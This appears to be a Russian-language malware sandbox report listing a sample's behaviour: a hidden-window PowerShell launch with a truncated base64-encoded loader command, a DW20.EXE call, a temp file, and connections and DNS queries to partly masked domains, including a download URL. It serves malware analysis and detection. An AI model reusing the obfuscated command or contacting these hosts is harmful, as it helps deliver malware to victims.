Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
- %TEMP%\601134.cvr
- 're######-demo-website.com':80
- 'mo###umps.com':443
- 'tw####rprint.com':443
- 'x1.#.lencr.org':80
- 'pl#######audesemcarencia.com':80
- http://x1.#.lencr.org/
- http://pl#######audesemcarencia.com/erros/JHoq/
- 'mo###umps.com':443
- 'tw####rprint.com':443
- DNS ASK re######-demo-website.com
- DNS ASK mo###umps.com
- DNS ASK tw####rprint.com
- DNS ASK x1.#.lencr.org
- DNS ASK si###ations.org
- DNS ASK pl#######audesemcarencia.com
- DNS ASK vi####achina.com
- DNS ASK ce#####ltural.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwA... (со скрытым окном)